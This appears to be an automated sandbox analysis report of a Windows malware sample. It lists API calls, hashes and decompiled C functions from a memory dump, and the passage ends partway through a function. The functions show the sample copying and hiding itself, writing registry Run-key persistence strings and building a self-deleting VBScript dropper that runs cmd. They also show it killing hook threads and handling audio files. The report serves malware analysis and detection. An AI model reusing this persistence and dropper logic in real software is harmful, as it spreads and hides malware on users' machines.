                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 006DB1DB
                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 006DB1EE
                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 006DB206
                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 006DB234
                                      • Part of subcall function 006D9D73: TerminateThread.KERNEL32(006D884B,00000000,?,006DB101), ref: 006D9D82
                                      • Part of subcall function 006D9D73: UnhookWindowsHookEx.USER32(00000000), ref: 006D9D92
                                      • Part of subcall function 006D9D73: TerminateThread.KERNEL32(Function_00008830,00000000,?,006DB101), ref: 006D9DA4
                                      • Part of subcall function 006E7947: CreateFileW.KERNEL32(i]m,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000004,00000000,00000000,?,006E7A71,00000000,00000000), ref: 006E7986
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,0072F724,0072F724,00000000), ref: 006DB457
                                    • ExitProcess.KERNEL32 ref: 006DB463
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
• Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                    • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                    • API String ID: 1861856835-1536747724
                                    • Opcode ID: 1eb56fd5c4c95b228a5b7114856cbfe61e6f47163575f4218dd2430affa60ca9
                                    • Instruction ID: 74cc0979d552f5bc60fd307b46d89ef947ba62f41a303b403a969d7ff1fa25f1
                                    • Opcode Fuzzy Hash: 1eb56fd5c4c95b228a5b7114856cbfe61e6f47163575f4218dd2430affa60ca9
                                    • Instruction Fuzzy Hash: 47916E71E141586ADB55F7A0ECA6DEE776BAF51300F00002FF806AB392EF641E46C799
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 86%
                                    			E006E69CC(void* __ecx, void* __edx, char _a4) {
                                    				char _v24;
                                    				char _v28;
                                    				char _v52;
                                    				char _v76;
                                    				char _v100;
                                    				char _v124;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* _t25;
                                    				void* _t28;
                                    				void* _t43;
                                    				void* _t60;
                                    				void* _t63;
                                    				void* _t67;
                                    				CHAR* _t89;
                                    				void* _t109;
                                    				CHAR* _t110;
                                    				void* _t111;
                                    				void* _t114;
                                    				void* _t118;
                                    
                                    				_t103 = __edx;
                                    				_t67 = __ecx;
                                    				_t109 = __edx;
                                    				if(E006E6C12( &_a4, __ecx, __ecx) == 0xffffffff) {
                                    					_t63 = E006D1EEB( &_a4);
                                    					_t103 = 0x30;
                                    					E006D1EFA( &_a4, 0x30, _t111, E006E805B( &_v28, 0x30, _t63));
                                    					E006D1EF0();
                                    				}
                                    				_t25 = E006D2489();
                                    				_t120 = _t25;
                                    				if(_t25 == 0) {
                                    					__eflags = PathFileExistsW(E006D1EEB( &_a4));
                                    					if(__eflags != 0) {
                                    						goto L4;
                                    					} else {
                                    						E006D2084(_t67, _t114 - 0x18, 0x72f6bc);
                                    						_push(0xa8);
                                    						E006D4AA4(_t67, 0x73ca18, _t103, __eflags);
                                    					}
                                    				} else {
                                    					_t60 = E006D1EEB( &_a4);
                                    					_t118 = _t114 - 0x18;
                                    					E006D20EC(_t67, _t118, _t103, _t120, _t109);
                                    					E006E7A4E(_t60);
                                    					_t114 = _t118 + 0x18;
                                    					L4:
                                    					_t28 = E006E72DA( &_v124, _t67);
                                    					_t108 = E006D3030( &_v28, E006D30A6(_t67,  &_v76, E006D9E69( &_v100, L"open \"", _t120,  &_a4), _t109, _t120, L"\" type "), _t28);
                                    					E006D30A6(_t67,  &_v52, _t32, _t109, _t120, L" alias audio");
                                    					E006D1EF0();
                                    					E006D1EF0();
                                    					E006D1EF0();
                                    					E006D1EF0();
                                    					mciSendStringW(E006D1EEB( &_v52), 0, 0, 0);
                                    					mciSendStringA("play audio", 0, 0, 0);
                                    					_t115 = _t114 - 0x18;
                                    					E006D2084(0, _t114 - 0x18, 0x72f6bc);
                                    					_push(0xa9);
                                    					E006D4AA4(0, 0x73ca18, _t32, 0);
                                    					_t43 = CreateEventA(0, 1, 0, 0);
                                    					while(1) {
                                    						L5:
                                    						 *0x73bea8 = _t43;
                                    						while(1) {
                                    							_t122 = _t43;
                                    							if(_t43 == 0) {
                                    								break;
                                    							}
                                    							__eflags =  *0x73bea6; // 0x0
                                    							if(__eflags != 0) {
                                    								mciSendStringA("pause audio", 0, 0, 0);
                                    								 *0x73bea6 = 0;
                                    							}
                                    							__eflags =  *0x73bea5; // 0x0
                                    							if(__eflags != 0) {
                                    								mciSendStringA("resume audio", 0, 0, 0);
                                    								 *0x73bea5 = 0;
                                    							}
                                    							mciSendStringA("status audio mode",  &_v24, 0x14, 0);
                                    							_t108 =  &_v24;
                                    							_t110 = "stopped";
                                    							_t89 = 0;
                                    							while(1) {
                                    								__eflags = ( *(_t108 + _t89) & 0x000000ff) -  *((intOrPtr*)(_t110 + _t89));
                                    								if(( *(_t108 + _t89) & 0x000000ff) !=  *((intOrPtr*)(_t110 + _t89))) {
                                    									break;
                                    								}
                                    								_t89 = _t89 + 1;
                                    								__eflags = _t89 - 8;
                                    								if(_t89 != 8) {
                                    									continue;
                                    								} else {
                                    									SetEvent( *0x73bea8);
                                    								}
                                    								break;
                                    							}
                                    							__eflags = WaitForSingleObject( *0x73bea8, 0x1f4);
                                    							if(__eflags != 0) {
                                    								_t43 =  *0x73bea8; // 0x0
                                    							} else {
                                    								CloseHandle( *0x73bea8);
                                    								_t43 = 0;
                                    								goto L5;
                                    							}
                                    						}
                                    						mciSendStringA("stop audio", 0, 0, 0);
                                    						mciSendStringA("close audio", 0, 0, 0);
                                    						E006D2084(0, _t115 - 0x18, 0x72f6bc);
                                    						_push(0xaa);
                                    						E006D4AA4(0, 0x73ca18, _t108, _t122);
                                    						E006D1EF0();
                                    						goto L21;
                                    					}
                                    				}
                                    				L21:
                                    				return E006D1EF0();
                                    			}

                                    Address column of the decompiled listing above:
                                    0x006e69cc 0x006e69d6 0x006e69d8 0x006e69e6 0x006e69eb 0x006e69f1 0x006e6a00 0x006e6a08
                                    0x006e6a08 0x006e6a0f 0x006e6a17 0x006e6a19 0x006e6b06 0x006e6b08 0x00000000 0x006e6b0e
                                    0x006e6b18 0x006e6b1d 0x006e6b27 0x006e6b27 0x006e6a1f 0x006e6a1f 0x006e6a24 0x006e6a2c
                                    0x006e6a33 0x006e6a38 0x006e6a3b 0x006e6a45 0x006e6a78 0x006e6a7d 0x006e6a86 0x006e6a8e
                                    0x006e6a96 0x006e6a9e 0x006e6ab1 0x006e6ac5 0x006e6ac7 0x006e6ad1 0x006e6ad6 0x006e6ae0
                                    0x006e6aea 0x006e6af0 0x006e6af0 0x006e6af0 0x006e6bc1 0x006e6bc1 0x006e6bc3 0x00000000
                                    0x00000000 0x006e6b31 0x006e6b37 0x006e6b41 0x006e6b43 0x006e6b43 0x006e6b49 0x006e6b4f
                                    0x006e6b59 0x006e6b5b 0x006e6b5b 0x006e6b6d 0x006e6b6f 0x006e6b72 0x006e6b77 0x006e6b79
                                    0x006e6b7d 0x006e6b80 0x00000000 0x00000000 0x006e6b82 0x006e6b83 0x006e6b86 0x00000000
                                    0x006e6b88 0x006e6b8e 0x006e6b8e 0x00000000 0x006e6b86 0x006e6ba5 0x006e6ba7 0x006e6bbc
                                    0x006e6ba9 0x006e6baf 0x006e6bb5 0x00000000 0x006e6bb5 0x006e6ba7 0x006e6bd1 0x006e6bdb
                                    0x006e6be7 0x006e6bec 0x006e6bf6 0x006e6bfe 0x00000000 0x006e6bfe 0x006e6af0 0x006e6c03
                                    0x006e6c11

                                    APIs
                                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 006E6AB1
                                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 006E6AC5
                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,0072F6BC), ref: 006E6AEA
                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000,0073C238), ref: 006E6B00
                                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 006E6B41
                                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 006E6B59
                                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 006E6B6D
                                    • SetEvent.KERNEL32 ref: 006E6B8E
                                    • WaitForSingleObject.KERNEL32(000001F4), ref: 006E6B9F
                                    • CloseHandle.KERNEL32 ref: 006E6BAF
                                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 006E6BD1
                                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 006E6BDB
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                    • API String ID: 738084811-1354618412
                                    • Opcode ID: 17c2f6e43e8d696a918ba29b9aef4913c9246ac903ae0f8a77ffe83b934554ba
                                    • Instruction ID: 9946a59acd654f79882b29a84dcee82ae91c1de86ec1dc2749b1e77e07697eee
                                    • Opcode Fuzzy Hash: 17c2f6e43e8d696a918ba29b9aef4913c9246ac903ae0f8a77ffe83b934554ba
                                    • Instruction Fuzzy Hash: 9751D671A402497FE714F7B8DC92CBF3B6FDF51384B00812EF502A6292DE644E4687A9
                                    Uniqueness
                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 95%
                                    			E006D1A64(WCHAR* __ecx, signed int __edx) {
                                    				long _v8;
                                    				void _v12;
                                    				void _v16;
                                    				void _v20;
                                    				void _v24;
                                    				void _v28;
                                    				void _v32;
                                    				signed int _t36;
                                    				void** _t75;
                                    				signed int _t80;
                                    				void* _t81;
                                    				signed int _t83;
                                    
                                    				_t75 = __edx;
                                    				_t80 =  *0x73ba9a & 0x0000ffff;
                                    				_t83 = ( *0x73baa6 & 0x0000ffff) * _t80;
                                    				_v20 = 1;
                                    				_v16 = 0x10;
                                    				_v24 = _t83 *  *0x73ba9c >> 3;
                                    				asm("cdq");
                                    				_v28 = _t83 + (__edx & 0x00000007) >> 3;
                                    				_t36 =  *(__edx + 4) * _t80;
                                    				_v32 = _t36;
                                    				_v12 = _t36 + 0x24;
                                    				_t81 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
                                    				if(_t81 != 0xffffffff) {
                                    					WriteFile(_t81, "RIFF", 4,  &_v8, 0);
                                    					WriteFile(_t81,  &_v12, 4,  &_v8, 0);
                                    					WriteFile(_t81, "WAVE", 4,  &_v8, 0);
                                    					WriteFile(_t81, "fmt ", 4,  &_v8, 0);
                                    					WriteFile(_t81,  &_v16, 4,  &_v8, 0);
                                    					WriteFile(_t81,  &_v20, 2,  &_v8, 0);
                                    					WriteFile(_t81, 0x73ba9a, 2,  &_v8, 0);
                                    					WriteFile(_t81, 0x73ba9c, 4,  &_v8, 0);
                                    					WriteFile(_t81,  &_v24, 4,  &_v8, 0);
                                    					WriteFile(_t81,  &_v28, 2,  &_v8, 0);
                                    					WriteFile(_t81, 0x73baa6, 2,  &_v8, 0);
                                    					WriteFile(_t81, "data", 4,  &_v8, 0);
                                    					WriteFile(_t81,  &_v32, 4,  &_v8, 0);
                                    					WriteFile(_t81,  *_t75, _t75[1],  &_v8, 0);
                                    					CloseHandle(_t81);
                                    					return 1;
                                    				}
                                    				return 0;
                                    			}

                                    Address column of the decompiled listing above:
                                    0x006d1a73 0x006d1a76 0x006d1a7d 0x006d1a80 0x006d1a87 0x006d1a9a 0x006d1a9f 0x006d1ab0
                                    0x006d1ab8 0x006d1ac3 0x006d1ac9 0x006d1ad2 0x006d1ad7 0x006d1af3 0x006d1b02 0x006d1b12
                                    0x006d1b22 0x006d1b31 0x006d1b40 0x006d1b50 0x006d1b60 0x006d1b6f 0x006d1b7e 0x006d1b8e
                                    0x006d1b9e 0x006d1bad 0x006d1bbb 0x006d1bbe 0x00000000 0x006d1bc4 0x00000000

                                    APIs
                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1ACC
                                    • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1AF3
                                    • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1B02
                                    • WriteFile.KERNEL32(00000000,WAVE,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1B12
                                    • WriteFile.KERNEL32(00000000,fmt ,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1B22
                                    • WriteFile.KERNEL32(00000000,00000010,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1B31
                                    • WriteFile.KERNEL32(00000000,00000001,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1B40
                                    • WriteFile.KERNEL32(00000000,0073BA9A,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1B50
                                    • WriteFile.KERNEL32(00000000,0073BA9C,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1B60
                                    • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1B6F
                                    • WriteFile.KERNEL32(00000000,?,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1B7E
                                    • WriteFile.KERNEL32(00000000,0073BAA6,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1B8E
                                    • WriteFile.KERNEL32(00000000,data,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1B9E
                                    • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1BAD
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: File$Write$Create
                                    • String ID: RIFF$WAVE$data$fmt
                                    • API String ID: 1602526932-4212202414
                                    • Opcode ID: 410a10c3014acdd53fbde371a90724c5feba3d1e9e554444b33e330895fd5139
                                    • Instruction ID: 7d48e5f8c6794f82428aa3601f3606a668a9fa91611bf266effa2af146d70c36
                                    • Opcode Fuzzy Hash: 410a10c3014acdd53fbde371a90724c5feba3d1e9e554444b33e330895fd5139
                                    • Instruction Fuzzy Hash: A041F8B5A4021CBAE710DA918D86FFFBABCEB45B50F404056F704EA1C1D7B45A05EBA1
                                    Uniqueness
                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 95%
                                    			E006DA987(char __ecx, intOrPtr* __edx, WCHAR* _a4, char _a8, char _a12) {
                                    				char _v9;
                                    				int _v20;
                                    				char _v44;
                                    				char _v68;
                                    				char _v92;
                                    				char _v116;
                                    				char _v140;
                                    				char _v164;
                                    				char _v188;
                                    				char _v212;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				intOrPtr _t62;
                                    				void* _t63;
                                    				signed int _t67;
                                    				signed int _t68;
                                    				int _t70;
                                    				void* _t79;
                                    				void* _t91;
                                    				void* _t92;
                                    				int _t94;
                                    				void* _t99;
                                    				void* _t100;
                                    				WCHAR* _t113;
                                    				int _t115;
                                    				intOrPtr _t118;
                                    				WCHAR* _t123;
                                    				int _t124;
                                    				void* _t139;
                                    				intOrPtr* _t152;
                                    				int _t153;
                                    				intOrPtr* _t207;
                                    				int _t208;
                                    				intOrPtr* _t235;
                                    				void* _t236;
                                    				void* _t239;
                                    				void* _t249;
                                    				void* _t250;
                                    				intOrPtr _t254;
                                    				void* _t257;
                                    				void* _t259;
                                    				intOrPtr* _t260;
                                    
                                    				_t235 = __edx;
                                    				_v9 = __ecx;
                                    				_t260 = __edx;
                                    				_v20 = 0;
                                    				_t257 = __edx + 2;
                                    				do {
                                    					_t62 =  *_t235;
                                    					_t235 = _t235 + 2;
                                    				} while (_t62 != 0);
                                    				_t236 = _t235 - _t257;
                                    				_t268 = _t236;
                                    				if(_t236 == 0) {
                                    					_t143 = _a4;
                                    					_t238 = __ecx;
                                    					_t63 = E006E805B( &_v92, __ecx, _t143);
                                    					_t259 = 0x73c500;
                                    					E006D1EFA(0x73c500, _t238, _t260, _t63);
                                    				} else {
                                    					CreateDirectoryW(E006D1EEB(0x73c530), 0);
                                    					_t143 = _a4;
                                    					_t139 = E006D30A6(_t143,  &_v92, E006D7514( &_v44, 0x73c530, _t268, "\\"), 0x73c530, _t268, _t143);
                                    					_t259 = 0x73c500;
                                    					E006D1EFA(0x73c500, _t138, _t260, _t139);
                                    					E006D1EF0();
                                    				}
                                    				E006D1EF0();
                                    				_t152 = E006D1EEB(_t259);
                                    				_t67 = 0x73bb08;
                                    				while(1) {
                                    					_t239 =  *_t67;
                                    					if(_t239 !=  *_t152) {
                                    						break;
                                    					}
                                    					if(_t239 == 0) {
                                    						L10:
                                    						_t153 = 0;
                                    						_t68 = 0;
                                    						L12:
                                    						if(_t68 != 0) {
                                    							_t70 = CopyFileW(0x73bb08, E006D1EEB(_t259), _t153);
                                    							__eflags = _t70;
                                    							if(_t70 != 0) {
                                    								L23:
                                    								E006DA896(0x73c4e8, E006D1EEB(0x73c4e8));
                                    								__eflags = _a8 - 1;
                                    								_pop(_t157);
                                    								if(__eflags != 0) {
                                    									L28:
                                    									E006D30A6(_t143,  &_v92, E006D427F(_t143,  &_v68, E0070987F(_t143, _t157, __eflags, L"Temp")), _t259, __eflags, L"\\install.vbs");
                                    									E006D1EF0();
                                    									E006D427F(_t143,  &_v44, L"WScript.Sleep 1000\n");
                                    									E006D766C(_t143,  &_v44, _t259, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
                                    									__eflags = _a12 - 1;
                                    									_t144 = "\n";
                                    									if(__eflags == 0) {
                                    										_t100 = E006D427F("\n",  &_v212, 0x73bb08);
                                    										E006D3311(E006D30A6(_t144,  &_v68, E006D30A6(_t144,  &_v116, E006D3030( &_v140, E006D30A6(_t144,  &_v164, E006D427F("\n",  &_v188, L"fso.DeleteFile "), _t259, __eflags, "\""), _t100), _t259, __eflags, "\""), _t259, __eflags, _t144));
                                    										E006D1EF0();
                                    										E006D1EF0();
                                    										E006D1EF0();
                                    										E006D1EF0();
                                    										E006D1EF0();
                                    										E006D1EF0();
                                    									}
                                    									_t79 = E006D427F(_t144,  &_v116, L"\"\"\", 0");
                                    									E006D3311(E006D30A6(_t144,  &_v212, E006D3030( &_v188, E006D4429(_t144,  &_v164, E006D427F(_t144,  &_v68, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), __eflags, _t259), _t79), _t259, __eflags, _t144));
                                    									E006D1EF0();
                                    									E006D1EF0();
                                    									E006D1EF0();
                                    									E006D1EF0();
                                    									E006D1EF0();
                                    									E006D766C(_t144,  &_v44, _t259, L"fso.DeleteFile(Wscript.ScriptFullName)");
                                    									_t91 = E006D1EEB( &_v92);
                                    									_t92 = E006D2489();
                                    									_t94 = E006E7947(E006D1EEB( &_v44), _t92 + _t92, _t91, 0);
                                    									__eflags = _t94;
                                    									if(_t94 == 0) {
                                    										L33:
                                    										E006D1EF0();
                                    										return E006D1EF0();
                                    									} else {
                                    										_t99 = ShellExecuteW(0, L"open", E006D1EEB( &_v92), 0x72f724, 0x72f724, 0);
                                    										__eflags = _t99 - 0x20;
                                    										if(_t99 <= 0x20) {
                                    											goto L33;
                                    										}
                                    										ExitProcess(0);
                                    									}
                                    								}
                                    								_t113 = E006D1EEB(_t259);
                                    								_t143 = SetFileAttributesW;
                                    								SetFileAttributesW(_t113, 7);
                                    								_t249 = _t260 + 2;
                                    								_t157 = 0;
                                    								__eflags = 0;
                                    								do {
                                    									_t115 =  *_t260;
                                    									_t260 = _t260 + 2;
                                    									__eflags = _t115;
                                    								} while (_t115 != 0);
                                    								__eflags = _t260 - _t249;
                                    								if(__eflags != 0) {
                                    									_t157 = 0x73c530;
                                    									SetFileAttributesW(E006D1EEB(0x73c530), 7);
                                    								}
                                    								goto L28;
                                    							}
                                    							__eflags = _v9 - 0x36;
                                    							if(_v9 == 0x36) {
                                    								goto L23;
                                    							}
                                    							_t207 = _t260;
                                    							_t250 = _t207 + 2;
                                    							do {
                                    								_t118 =  *_t207;
                                    								_t207 = _t207 + 2;
                                    								__eflags = _t118 - _v20;
                                    							} while (_t118 != _v20);
                                    							_t208 = _t207 - _t250;
                                    							__eflags = _t208;
                                    							_push(_t143);
                                    							if(_t208 == 0) {
                                    								E006D1EFA(_t259, 0x36, _t260, E006E805B( &_v68, 0x36));
                                    							} else {
                                    								E006D1EFA(_t259, _t128, _t260, E006D30A6(_t143,  &_v140, E006D30A6(_t143,  &_v116, E006E805B( &_v68, 0x36, _t260), _t259, __eflags, "\\"), _t259, __eflags));
                                    								E006D1EF0();
                                    								E006D1EF0();
                                    							}
                                    							E006D1EF0();
                                    							_t123 = E006D1EEB(_t259);
                                    							_t143 = 0x73bb08;
                                    							_t124 = CopyFileW(0x73bb08, _t123, 0);
                                    							__eflags = _t124;
                                    							if(_t124 != 0) {
                                    								goto L23;
                                    							} else {
                                    								E006D9DC9(0x73bb08, _t259, 0x73bb08);
                                    								return 0;
                                    							}
                                    						}
                                    						E006DA896(0x73c4e8, E006D1EEB(0x73c4e8));
                                    						return 1;
                                    					}
                                    					_t12 = _t67 + 2; // 0x0
                                    					_t254 =  *_t12;
                                    					if(_t254 !=  *((intOrPtr*)(_t152 + 2))) {
                                    						break;
                                    					}
                                    					_t67 = _t67 + 4;
                                    					_t152 = _t152 + 4;
                                    					if(_t254 != 0) {
                                    						continue;
                                    					}
                                    					goto L10;
                                    				}
                                    				asm("sbb eax, eax");
                                    				_t68 = _t67 | 0x00000001;
                                    				_t153 = 0;
                                    				__eflags = 0;
                                    				goto L12;
                                    			}

                                    Address column of the decompiled listing above:
                                    0x006da987 0x006da994 0x006da998 0x006da99a 0x006da99d 0x006da9a0 0x006da9a0 0x006da9a3
                                    0x006da9a6 0x006da9ab 0x006da9ab 0x006da9b4 0x006da9fe 0x006daa01 0x006daa07 0x006daa0d
                                    0x006daa15 0x006da9b6 0x006da9bf 0x006da9c5 0x006da9de 0x006da9e4 0x006da9ec 0x006da9f4
                                    0x006da9f9 0x006daa1d 0x006daa29 0x006daa2b 0x006daa30 0x006daa30 0x006daa36 0x00000000
                                    0x00000000 0x006daa3b 0x006daa52 0x006daa52 0x006daa54 0x006daa5f 0x006daa61 0x006daa8b
                                    0x006daa91 0x006daa93 0x006dab42 0x006dab4e 0x006dab53 0x006dab58 0x006dab59 0x006dab92
                                    0x006dabb0 0x006dabb9 0x006dabc6 0x006dabd3 0x006dabd8 0x006dabdc 0x006dabe1 0x006dabf9
                                    0x006dac46 0x006dac4e 0x006dac56 0x006dac61 0x006dac6c 0x006dac77 0x006dac82 0x006dac82
                                    0x006dac90 0x006dacd2 0x006dacdd 0x006dace8 0x006dacf3 0x006dacfb 0x006dad03 0x006dad10
                                    0x006dad1b 0x006dad24 0x006dad39 0x006dad40 0x006dad42 0x006dad6d 0x006dad70 0x00000000
                                    0x006dad44 0x006dad5b 0x006dad61 0x006dad64 0x00000000 0x00000000 0x006dad67 0x006dad67
                                    0x006dad42 0x006dab5f 0x006dab64 0x006dab6b 0x006dab6d 0x006dab70 0x006dab70 0x006dab72
                                    0x006dab72 0x006dab75 0x006dab78 0x006dab78 0x006dab7d 0x006dab81 0x006dab85 0x006dab90
                                    0x006dab90 0x00000000 0x006dab81 0x006daa99 0x006daa9d 0x00000000 0x00000000 0x006daaa3
                                    0x006daaa5 0x006daaa8 0x006daaa8 0x006daaab 0x006daaae 0x006daaae 0x006daab4 0x006daab4
                                    0x006daaba 0x006daabe 0x006dab0b 0x006daac0 0x006daae8 0x006daaf3 0x006daafb 0x006daafb
                                    0x006dab13 0x006dab1d
                                    0x006dab23
                                    0x006dab29
                                    0x006dab2f
                                    0x006dab31
                                    0x00000000
                                    0x006dab33
                                    0x006dab36
                                    0x00000000
                                    0x006dab3b
                                    0x006dab31
                                    0x006daa6f
                                    0x00000000
                                    0x006daa76
                                    0x006daa3d
                                    0x006daa3d
                                    0x006daa45
                                    0x00000000
                                    0x00000000
                                    0x006daa47
                                    0x006daa4a
                                    0x006daa50
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x006daa50
                                    0x006daa58
                                    0x006daa5a
                                    0x006daa5d
                                    0x006daa5d
                                    0x00000000

                                    APIs
                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 006DA9BF
                                    • CopyFileW.KERNEL32(0073BB08,00000000,00000000,00000000), ref: 006DAA8B
                                    • CopyFileW.KERNEL32(0073BB08,00000000,00000000,00000000), ref: 006DAB29
                                      • Part of subcall function 006E805B: GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 006E81B2
                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 006DAB6B
                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 006DAB90
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,0072F724,0072F724,00000000), ref: 006DAD5B
                                    • ExitProcess.KERNEL32 ref: 006DAD67
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesCopy$CreateDirectoryExecuteExitLongNamePathProcessShell
                                    • String ID: """, 0$6$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
                                    • API String ID: 4018752923-1662879639
                                    • Opcode ID: 03bdb243fba6adc90e74f06e3b70543210a8ca29304c545f913018ef525954e3
                                    • Instruction ID: 2cda71abb4b32994021f3be81205d85d9641ea19893da2353b45b40b7a1a65d0
                                    • Opcode Fuzzy Hash: 03bdb243fba6adc90e74f06e3b70543210a8ca29304c545f913018ef525954e3
                                    • Instruction Fuzzy Hash: 0DA16271E0411466CB68F7A4DC92EFE737BAF55300F44402FF806AA392EE745E46C66A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 87%
                                    			E007176AD(signed int _a4, signed int _a8) {
                                    				signed int _v0;
                                    				signed char _v5;
                                    				intOrPtr _v8;
                                    				signed char _v9;
                                    				signed int _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				intOrPtr _v24;
                                    				signed int _v44;
                                    				signed int _v92;
                                    				signed int _v128;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				signed int _t116;
                                    				signed int _t119;
                                    				signed int _t120;
                                    				signed int _t122;
                                    				signed int _t123;
                                    				signed int _t126;
                                    				signed int _t127;
                                    				signed int _t131;
                                    				signed int _t133;
                                    				signed int _t136;
                                    				signed int _t138;
                                    				signed int _t139;
                                    				signed int _t142;
                                    				void* _t143;
                                    				signed int _t148;
                                    				signed int* _t150;
                                    				signed int* _t156;
                                    				signed int _t163;
                                    				signed int _t165;
                                    				signed int _t167;
                                    				intOrPtr _t168;
                                    				signed int _t173;
                                    				signed int _t175;
                                    				signed int _t176;
                                    				signed int _t180;
                                    				signed int _t185;
                                    				intOrPtr* _t186;
                                    				signed int _t191;
                                    				signed int _t196;
                                    				signed int _t197;
                                    				signed int _t204;
                                    				intOrPtr* _t205;
                                    				signed int _t214;
                                    				signed int _t215;
                                    				signed int _t217;
                                    				signed int _t218;
                                    				signed int _t220;
                                    				signed int _t221;
                                    				signed int _t223;
                                    				intOrPtr _t225;
                                    				void* _t231;
                                    				signed int _t233;
                                    				void* _t236;
                                    				signed int _t237;
                                    				signed int _t238;
                                    				void* _t241;
                                    				signed int _t244;
                                    				signed int _t246;
                                    				void* _t252;
                                    				signed int _t253;
                                    				signed int _t254;
                                    				void* _t260;
                                    				void* _t262;
                                    				signed int _t263;
                                    				intOrPtr* _t267;
                                    				intOrPtr* _t271;
                                    				signed int _t274;
                                    				signed int _t276;
                                    				signed int _t280;
                                    				signed int _t282;
                                    				void* _t283;
                                    				void* _t284;
                                    				void* _t285;
                                    				signed int _t286;
                                    				signed int _t288;
                                    				signed int _t290;
                                    				signed int _t291;
                                    				signed int* _t292;
                                    				signed int _t298;
                                    				signed int _t299;
                                    				CHAR* _t300;
                                    				signed int _t302;
                                    				signed int _t303;
                                    				WCHAR* _t304;
                                    				signed int _t305;
                                    				signed int _t306;
                                    				signed int* _t307;
